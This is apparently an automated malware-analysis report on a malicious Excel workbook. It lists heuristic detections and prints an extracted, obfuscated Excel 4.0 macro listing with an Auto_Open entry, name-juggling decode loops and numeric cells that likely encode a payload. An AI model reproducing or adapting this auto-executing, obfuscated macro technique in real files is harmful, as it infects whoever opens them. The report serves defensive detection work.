MALICIOUS
Risk Score: 180
Heuristics 4
- Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN: Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- x86 GetPC stub (CALL $+5; POP EBP) [high] SC_GETPC_CALL: Disassembly hidden; these bytes score as degenerate, not coherent x86 code (single mnemonic 'add' is 68% of instructions, a sled or padding/filler run, not program logic).
- Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN: Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6625 bytes |

SHA-256: 85bbb3c756954bf17696699011c3b8f37294edb5d8c6335a2bad0fe2f3b77267
Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - AthdvL
' 0018 25 LABEL : Cell Value, String Constant - AoXaBJYEaR len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I188
' 0018 21 LABEL : Cell Value, String Constant - CCLTlT len=0
' 0018 20 LABEL : Cell Value, String Constant - dchoX len=0
' 0018 20 LABEL : Cell Value, String Constant - fgTGc len=0
' 0018 20 LABEL : Cell Value, String Constant - FVRIh len=0
' 0018 25 LABEL : Cell Value, String Constant - IOMFTgeimJ len=0
' 0018 22 LABEL : Cell Value, String Constant - jgNuneI len=0
' 0018 26 LABEL : Cell Value, String Constant - KmsgweBMOQC len=0
' 0018 22 LABEL : Cell Value, String Constant - lVixsGA len=0
' 0018 26 LABEL : Cell Value, String Constant - ndasOFbpFgF len=0
' 0018 20 LABEL : Cell Value, String Constant - Nrjgx len=0
' 0018 22 LABEL : Cell Value, String Constant - QHgJxlt len=0
' 0018 21 LABEL : Cell Value, String Constant - RhBRNg len=0
' 0018 20 LABEL : Cell Value, String Constant - sUAcA len=0
' 0018 27 LABEL : Cell Value, String Constant - tFYLAtAJvScl len=0
' 0018 20 LABEL : Cell Value, String Constant - VgBIZ len=0
' 0018 24 LABEL : Cell Value, String Constant - wVUgDGEIn len=0
' 0018 21 LABEL : Cell Value, String Constant - XCCPda len=0
' 0018 20 LABEL : Cell Value, String Constant - XiBVl len=0
' 0018 26 LABEL : Cell Value, String Constant - ZQNmuHpRbcr len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' AthdvL,R59,"",-741.00000000000000000000
' AthdvL,R60,"",88.00000000000000000000
' AthdvL,R61,"",-15.00000000000000000000
' AthdvL,R62,"",111.00000000000000000000
' AthdvL,R63,"",428.00000000000000000000
' AthdvL,R64,"",439.00000000000000000000
' AthdvL,I95,"SET.NAME("KmsgweBMOQC",0+VALUE("0"))",""
' AthdvL,I99,"SET.NAME("VgBIZ",KmsgweBMOQC)",""
' AthdvL,I102,"SET.NAME("RhBRNg",KmsgweBMOQC)",""
' AthdvL,I107,"SET.NAME("sUAcA",COUNTA(lVixsGA))",""
' AthdvL,I111,"SET.NAME("FVRIh",COUNTA(ZQNmuHpRbcr))",""
' AthdvL,I113,[],""
' AthdvL,I115,"SET.NAME("Nrjgx","")",""
' AthdvL,I119,"VgBIZ",""
' AthdvL,I122,"SET.NAME("QHgJxlt",HLOOKUP("*",lVixsGA,VgBIZ,FALSE))",""
' AthdvL,I126,"jgNuneI",""
' AthdvL,I129,"SET.NAME("XCCPda",KmsgweBMOQC)",""
' AthdvL,I132,[],""
' AthdvL,I135,"XCCPda",""
' AthdvL,I140,"XiBVl",""
' AthdvL,I142,"tFYLAtAJvScl",""
' AthdvL,I145,"CCLTlT",""
' AthdvL,I150,"SET.NAME("dchoX",VALUE(HLOOKUP("*",ZQNmuHpRbcr,CCLTlT,FALSE)))",""
' AthdvL,I154,"wVUgDGEIn",""
' AthdvL,I159,"Nrjgx",""
' AthdvL,I163,"RhBRNg",""
' AthdvL,I167,NEXT(),""
' AthdvL,I170,"fgTGc",""
' AthdvL,I174,[],""
' AthdvL,I177,"IOMFTgeimJ",""
' AthdvL,I181,NEXT(),""
' AthdvL,I186,RETURN(),""
' AthdvL,I214,"SET.NAME("AoXaBJYEaR",I95)",""
' AthdvL,I216,"lVixsGA",""
' AthdvL,I220,"SET.NAME("ZQNmuHpRbcr",R70C12)",""
' AthdvL,I222,"SET.NAME("IOMFTgeimJ",232)",""
' AthdvL,I226,"SET.NAME("ndasOFbpFgF",9)",""
' AthdvL,I231,AoXaBJYEaR(),""
' AthdvL,I232,HALT(),""